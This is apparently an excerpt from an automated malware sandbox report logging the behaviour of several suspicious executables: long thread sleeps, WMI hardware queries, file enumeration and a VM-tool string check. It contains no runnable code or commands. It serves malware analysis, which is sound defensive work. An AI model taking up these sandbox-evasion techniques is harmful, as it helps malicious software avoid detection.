Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif TID: 7584	Thread sleep time: -900000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif TID: 7632	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif TID: 7584	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe TID: 7324	Thread sleep count: 568 > 30
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe TID: 7324	Thread sleep time: -5680000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe TID: 2284	Thread sleep time: -60000s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 5536	Thread sleep time: -90918s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -24903104499507879s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -600000s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -599876s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 1120	Thread sleep count: 5552 > 30
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -599748s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 1120	Thread sleep count: 4100 > 30
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -599593s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -599475s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -599359s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 5536	Thread sleep time: -88365s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -599192s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -598829s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -598466s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -598275s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -598122s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -597959s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -597755s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -597609s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -597491s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -597372s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -597219s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -597090s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -596969s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -596831s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -596712s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -596566s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -596440s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -596323s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -596204s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -596070s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -595880s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -595695s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -595055s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -594851s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -594684s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -594568s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -594447s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -594326s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -594205s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -594044s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -593923s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -593802s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -593666s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 5536	Thread sleep time: -87631s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -593555s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -593395s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -593270s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -593136s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -593024s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -592894s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -592725s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -592572s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -592428s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -591935s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -591600s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -591422s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -591314s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -591188s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -591072s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -590942s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -590798s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -590645s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -590517s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -590400s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -590274s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -590129s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -589991s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -589830s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -589589s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -589386s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -589203s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -589102s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -588969s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -588832s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -588576s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -588213s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 5536	Thread sleep time: -96076s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -587769s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -587619s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -587501s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -587354s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -587144s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -586881s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -586638s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -586470s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -586314s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -586105s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -585905s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -585639s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -585310s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -584895s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -584640s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -584477s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -584286s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -584155s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe TID: 6084	Thread sleep time: -16340000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe TID: 6304	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe TID: 1248	Thread sleep count: 58 > 30
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe TID: 1248	Thread sleep time: -116000s >= -30000s
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe TID: 5876	Thread sleep time: -37000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe TID: 3180	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3636	Thread sleep count: 170 > 30
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe TID: 4456	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2448	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BaseBoard

Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Code function: 0_2_004062EB FindFirstFileW,FindClose,	0_2_004062EB
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Code function: 0_2_00406CB1 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406CB1
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_00614005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	19_2_00614005
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_0061C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	19_2_0061C2FF
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_0061494A GetFileAttributesW,FindFirstFileW,FindClose,	19_2_0061494A
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_0061CD14 FindFirstFileW,FindClose,	19_2_0061CD14
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_0061CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	19_2_0061CD9F
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_0061F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	19_2_0061F5D8
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_0061F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	19_2_0061F735
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_0061FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	19_2_0061FA36
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_00613CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	19_2_00613CE2
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CC38B4 FindFirstFileExW,	24_2_00CC38B4
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_007638B4 FindFirstFileExW,	27_2_007638B4
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_004415EE FindFirstFileExW,	31_2_004415EE
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B31855 FindFirstFileExW,	31_2_02B31855

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_005C5D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

19_2_005C5D13

Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Thread delayed: delay time: 60000
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 90918
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 600000
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 599876
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 599748
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 599593
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 599475
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 599359
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 88365
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 599192
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 598829
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 598466
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 598275
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 598122
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 597959
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 597755
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 597609
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 597491
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 597372
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 597219
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 597090
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 596969
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 596831
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 596712
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 596566
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 596440
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 596323
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 596204
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 596070
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 595880
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 595695
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 595055
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 594851
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 594684
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 594568
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 594447
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 594326
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 594205
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 594044
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 593923
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 593802
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 593666
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 87631
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 593555
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 593395
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 593270
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 593136
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 593024
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 592894
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 592725
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 592572
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 592428
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 591935
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 591600
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 591422
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 591314
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 591188
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 591072
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 590942
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 590798
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 590645
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 590517
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 590400
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 590274
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 590129
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 589991
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 589830
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 589589
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 589386
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 589203
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 589102
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 588969
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 588832
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 588576
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 588213
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 96076
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 587769
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 587619
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 587501
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 587354
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 587144
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 586881
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 586638
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 586470
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 586314
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 586105
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 585905
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 585639
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 585310
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 584895
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 584640
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 584477
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 584286
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 584155
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Thread delayed: delay time: 60000
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Thread delayed: delay time: 37000
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\591950\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\591950	Jump to behavior

Source: Cerker.exe, 00000028.00000002.3447790560.00000000006EC000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: Avmtoolsd.dll
